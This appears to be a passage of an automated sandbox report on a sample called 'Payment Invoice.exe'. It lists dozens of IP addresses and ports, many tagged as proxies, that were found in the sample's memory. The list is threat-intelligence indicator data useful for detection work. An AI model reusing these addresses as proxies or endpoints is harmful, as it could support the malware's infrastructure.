                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.163.51.254
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.163.51.254://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.164.58.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.164.58.190:80800q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.164.58.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.128.171:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.128.171:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.155.171:1111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.155.171:1111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.155.238:1111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.155.238:1111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.175.71:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.175.71:56780
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163181E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.175.71:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.222.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.165.222.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.167.68.255:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.167.68.255:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.167.68.75:6363
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.167.68.75:6363://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.167.68.77:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.167.68.77:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.168.164.94:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.168.164.94:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.130.46:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.130.46:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.131.58:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.131.58:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.149.254:1111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.149.254:1111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.187.29:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.187.29:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.254.186:8061
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.169.254.186:8061://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.170.115.213:2020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.170.115.213:2020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.172.42.121:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.172.42.121:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.172.70.28:9191
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.172.70.28:9191://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.174.178.137:2016
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.174.178.137:2016://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.174.178.249:2004
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.174.178.249:2004://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.175.46.194:3125
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.175.46.194:3125://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.116.109:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.116.109:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.116.171:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.116.171:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.179.84:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.179.84:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.96.132:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.176.96.132:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.177.9.104:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.177.9.104:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.194.226:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.178.194.226:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B1E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.179.139.170:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.179.139.170:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.179.182.159:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.179.182.159:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.180.198.162:8181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.180.198.162:8181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AEF000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.182.112.11:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.182.112.11:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.183.60.226:32767
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.183.60.226:32767://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.183.63.14:83
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.183.63.14:83://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163195FC000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.185.111.29:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.185.111.29:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.186.8.162:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.186.8.162:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.116.108:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.116.108:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.123.149
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.123.149://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.123.149:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.249.196:1111
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.249.196:1111://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.96.98:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.189.96.98:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.190.54.141:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.190.54.141:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.191.155.62:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.191.155.62:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.191.196.47:3127
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.191.196.47:3127://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.197.71.7
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.197.71.7://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.197.71.7:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.199.155.18:6969
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.199.155.18:6969://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.199.18.248
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.199.18.248://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.199.18.248:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.200.135.229:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.200.135.229:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.209.68.197:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.209.68.197:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.210.35.40:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.210.35.40:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.212.93.193:45639
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.212.93.193:45639://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A35000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.212.93.201:45639
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.212.93.201:45639://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.212.93.241:45639
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.212.93.241:45639://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631695E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.213.219.200:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.213.219.200:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.213.242.42:34432
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.213.242.42:34432://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.214.156.17:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.214.156.17:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.214.219
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.214.219.23:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.214.219.23:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.216.51.36:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.216.51.36:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.217.213.145:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.217.213.145:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.217.217.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.217.217.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.217.224.201:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.217.224.201:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.224.124.75:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.224.124.75:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.226.232.188:3125
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.226.232.188:3125://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.227.186
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.227.186.13:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.227.186.13:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.229.85.249:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.229.85.249:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23.41.110:30058
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23.41.110:30058://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.230.49.132:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.230.49.132:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.231.248.98:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.231.248.98:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.159.5:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.159.5:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.24.105:8880
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.24.105:8880://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.26.163:9990
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.26.163:9990://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.27.153:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.27.153:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.28.211:8181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.234.28.211:8181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.24.107.186:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.24.107.186:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.242.105.7:3030
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.242.105.7:3030://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.242.107.146:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.242.119.88:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.243.114.206:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.243.114.206:80808
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.243.114.206:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.245.16.133:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.245.16.133:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.245.205
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.245.205.33:35158
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.245.205.33:35158://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.247.21.98:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.247.21.98:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.25.210.102:3382
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.25.210.102:3382://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.255.145.62:84
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.255.145.62:84://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.26.108.118:84
